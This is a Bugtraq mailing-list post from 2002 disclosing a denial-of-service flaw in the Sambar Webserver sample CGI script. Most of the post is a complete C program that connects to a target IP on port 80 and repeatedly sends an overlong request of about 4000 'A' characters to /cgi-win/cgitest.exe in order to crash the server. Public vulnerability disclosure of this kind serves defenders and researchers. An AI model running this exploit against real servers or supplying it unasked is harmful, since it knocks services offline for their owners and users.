Sambar Webserver Sample Script v5.1 DoS Vulnerability Exploit
Date: Tue, 1 Jan 2002 23:51:33 +0200
From: Tamer Sahin <ts@securityoffice.net>
To: bugtraq@securityfocus.com
Subject: Sambar Webserver Sample Script v5.1 DoS Vulnerability Exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Orginal Advisory: http://www.securityoffice.net/articles/sambar/
- ------------------<snip>----------------------------------------------
- ----------------------------------------
/*********************************************************************
**********
**
** 06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW
**
** Compiled with gcc under linux with kernel 2.4.17
**
** Programname: Sambar Server 5.0 Manufacturer:Jalyn
**
**********************************************************************
*********/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#define SERVER_PORT 80
#define MAX_MSG 100
int sd, rc, i,j;
char buf[5000];
char msgtosnd[5024];
char msgtoget[102400];
char source[200000];
struct sockaddr_in localAddr, servAddr;
struct hostent *h;
FILE *f1;
int main (int argc, char *argv[]) {
printf("Sleepy of Yast presents \"Sambar Server Production 5.0
Crasher\"\n");
if(argc != 2)
{
printf(">>> usage: %s <ip>",argv[0]);exit(0);
};
h = gethostbyname(argv[1]);
if(h==NULL)
{
printf("%s: unknown host '%s'\n",argv[0],argv[1]);
exit(1);
}
servAddr.sin_family = h->h_addrtype;
memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
servAddr.sin_port = htons(SERVER_PORT);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd<0)
{
perror("cannot open socket ");
exit(1);
}
localAddr.sin_family = AF_INET;
localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
localAddr.sin_port = htons(0);
rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
if(rc<0)
{
printf("%s: cannot bind port TCP %u\n",argv[0],SERVER_PORT);
perror("error ");
exit(1);
}
rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
if(rc<0)
{
perror("cannot connect ");
exit(1);
};
strcpy(buf,"A");
fprintf(stderr,"Entering Loop\n");
for(i=1;i<4000;i++)
{
strcat(buf,"A");
}
sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1\nhost:
localhost\n\n\n",buf);
for(j=0;j<5;j++)
{
send(sd,msgtosnd,5024,0);
}
printf("\n\n BOOOOM");
}
- ------------------<snap>----------------------------------------------
- ---------------------------------------
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPDIvZLuLpFMrXtywEQLPTQCghjA86aQNKMKYiTdJ/wkade1dZPoAn35c
bqGIVJG8SKE8tc5cZXcPs+i6
=5ywY
-----END PGP SIGNATURE-----